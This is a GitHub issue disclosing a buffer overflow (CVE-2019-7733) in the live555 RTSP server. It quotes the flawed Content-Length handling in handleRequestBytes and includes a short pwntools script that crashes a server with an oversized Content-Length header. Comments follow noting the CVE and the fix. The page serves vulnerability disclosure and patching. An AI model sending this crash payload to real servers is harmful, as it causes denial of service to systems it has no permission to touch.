Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

There is a buffer overflow which can lead to dos in live555 v0.95 #21

Open
zounathan opened this issue Feb 11, 2019 · 4 comments
Open

There is a buffer overflow which can lead to dos in live555 v0.95 #21

zounathan opened this issue Feb 11, 2019 · 4 comments

Comments

@zounathan
Copy link

When parse the request packet in function handleRequestBytes, the code don't check the content-length, and use it in memmove. Finally cause the buff overflow.

    unsigned requestSize = (fLastCRLF+4-fRequestBuffer) + contentLength;
    numBytesRemaining = fRequestBytesAlreadySeen - requestSize;
    resetRequestBuffer(); // to prepare for any subsequent request
    
    if (numBytesRemaining > 0) {
      memmove(fRequestBuffer, &fRequestBuffer[requestSize], numBytesRemaining);
      newBytesRead = numBytesRemaining;
    }

There is a content-length check, but it only assigns parseSucceeded to false.
This can't avoid the memmove.

Boolean parseSucceeded = parseRTSPRequestString((char*)fRequestBuffer, fLastCRLF+2 - fRequestBuffer,
						    cmdName, sizeof cmdName,
						    urlPreSuffix, sizeof urlPreSuffix,
						    urlSuffix, sizeof urlSuffix,
						    cseq, sizeof cseq,
						    sessionIdStr, sizeof sessionIdStr,
						    contentLength);
    fLastCRLF[2] = '\r'; // restore its value
    // Check first for a bogus "Content-Length" value that would cause a pointer wraparound:
    if (tmpPtr + 2 + contentLength < tmpPtr + 2) {
#ifdef DEBUG
      fprintf(stderr, "parseRTSPRequestString() returned a bogus \"Content-Length:\" value: 0x%x (%d)\n", contentLength, (int)contentLength);
#endif
      parseSucceeded = False;
    }

I can make the server crash with a simple packet.

from pwn import *
p1 = remote("IP", Port)

pl = "OPTIONS rtsp://10.113.214.93:8554/a.mkv RTSP/1.0\r\nCSeq: 1 \r\nUser-Agent: Lavf55.37.102\r\n"
pl += "Content-Length: 4294927296\r\n\r\n"
p1.send(pl)
@nluedtke
Copy link

This was assigned CVE-2019-7733.

@hlef
Copy link

hlef commented May 12, 2019

This was addressed in 2019.05.12, please close.

http://www.live555.com/liveMedia/public/changelog.txt

@NicoleG25
Copy link

This was addressed in 2019.05.12, please close.

http://www.live555.com/liveMedia/public/changelog.txt

Could you kindly point me to the commit that fixed the issue ?
Thanks :)

@hlef
Copy link

hlef commented Jan 11, 2020

This was addressed in 2019.05.12, please close.
http://www.live555.com/liveMedia/public/changelog.txt

Could you kindly point me to the commit that fixed the issue ?
Thanks :)

@NicoleG25 As far as I recall: ef01f0a, this line in particular https://github.com/rgaufman/live555/blob/master/liveMedia/RTSPServer.cpp#L717.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
4 participants
@hlef @nluedtke @zounathan @NicoleG25